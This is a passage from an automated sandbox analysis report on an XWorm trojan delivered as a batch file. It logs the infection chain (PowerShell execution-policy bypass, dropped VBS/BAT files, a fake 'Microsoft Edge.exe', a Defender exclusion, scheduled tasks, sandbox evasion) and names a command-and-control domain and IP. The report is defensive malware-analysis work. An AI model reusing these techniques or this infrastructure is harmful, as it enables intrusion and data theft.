                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected XWorm
                    Source: Yara matchFile source: 9.2.powershell.exe.13cd9398610.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7acbf20.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7a7bee8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7a53eb0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13cd9398610.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7a10e78.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3313915112.0000013CE7954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2963252000.0000013CD9346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3313915112.0000013CE7ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7828, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected XWorm
                    Source: Yara matchFile source: 9.2.powershell.exe.13cd9398610.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7acbf20.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7a7bee8.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7a53eb0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13cd9398610.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7a10e78.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3313915112.0000013CE7954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2963252000.0000013CD9346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3313915112.0000013CE7ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7828, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information112
                    Scripting                    		Valid Accounts12
                    Windows Management Instrumentation                    		112
                    Scripting                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		OS Credential Dumping1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    DLL Side-Loading                    		11
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory23
                    System Information Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Exploitation for Client Execution                    		1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		11
                    Obfuscated Files or Information                    		Security Account Manager431
                    Security Software Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    Command and Scripting Interpreter                    		1
                    Office Application Startup                    		21
                    Registry Run Keys / Startup Folder                    		2
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts1
                    Scheduled Task/Job                    		21
                    Registry Run Keys / Startup Folder                    		Network Logon Script1
                    Timestomp                    		LSA Secrets251
                    Virtualization/Sandbox Evasion                    		SSHKeylogging12
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable Media4
                    PowerShell                    		RC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586186 Sample: startup_str_466.bat Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 71 product-hack.gl.at.ply.gg 2->71 73 ip-api.com 2->73 83 Suricata IDS alerts for network traffic 2->83 85 Found malware configuration 2->85 87 Malicious sample detected (through community Yara rule) 2->87 89 22 other signatures 2->89 12 cmd.exe 1 2->12         started        15 Microsoft Edge.exe 2->15         started        17 wscript.exe 1 2->17         started        signatures3 process4 signatures5 109 Suspicious powershell command line found 12->109 111 Wscript starts Powershell (via cmd or directly) 12->111 113 Bypasses PowerShell execution policy 12->113 19 powershell.exe 3 19 12->19         started        23 conhost.exe 12->23         started        115 Powershell is started from unusual location (likely to bypass HIPS) 15->115 117 Reads the Security eventlog 15->117 119 Reads the System eventlog 15->119 25 conhost.exe 15->25         started        121 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->121 123 Suspicious execution chain found 17->123 process6 file7 63 C:\Users\user\AppData\...\startup_str_533.vbs, ASCII 19->63 dropped 65 C:\Users\user\AppData\...\startup_str_533.bat, DOS 19->65 dropped 91 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->91 93 Suspicious powershell command line found 19->93 95 Uses schtasks.exe or at.exe to add and modify task schedules 19->95 97 2 other signatures 19->97 27 wscript.exe 1 19->27         started        30 powershell.exe 37 19->30         started        signatures8 process9 signatures10 105 Wscript starts Powershell (via cmd or directly) 27->105 32 cmd.exe 1 27->32         started        107 Loading BitLocker PowerShell Module 30->107 35 conhost.exe 30->35         started        process11 signatures12 79 Suspicious powershell command line found 32->79 81 Wscript starts Powershell (via cmd or directly) 32->81 37 powershell.exe 15 20 32->37         started        42 conhost.exe 32->42         started        process13 dnsIp14 75 product-hack.gl.at.ply.gg 147.185.221.24, 50003, 50751 SALSGIVERUS United States 37->75 77 ip-api.com 208.95.112.1, 49731, 80 TUT-ASUS United States 37->77 67 C:\Users\user\AppData\...\Microsoft Edge.lnk, MS 37->67 dropped 69 C:\Users\user\AppData\...\Microsoft Edge.exe, PE32+ 37->69 dropped 99 Protects its processes via BreakOnTermination flag 37->99 101 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 37->101 103 Adds a directory exclusion to Windows Defender 37->103 44 powershell.exe 37->44         started        47 powershell.exe 37->47         started        49 powershell.exe 37->49         started        51 2 other processes 37->51 file15 signatures16 process17 signatures18 125 Loading BitLocker PowerShell Module 44->125 53 conhost.exe 44->53         started        55 conhost.exe 47->55         started        57 conhost.exe 49->57         started        59 conhost.exe 51->59         started        61 conhost.exe 51->61         started        process19

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    startup_str_466.bat11%ReversingLabsScript-BAT.Trojan.Alien

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\startup_str_533.vbs100%AviraVBS/Batrunner.OA
                    C:\Users\user\AppData\Roaming\Microsoft Edge.exe0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://ation.resou0%Avira URL Cloudsafe
                    product-hack.gl.at.ply.gg100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ip-api.com
                    		208.95.112.1
                    		truefalse
                      		high
                      product-hack.gl.at.ply.gg
                      		147.185.221.24
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://ip-api.com/line/?fields=hostingfalse
                          		high
                          product-hack.gl.at.ply.ggtrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
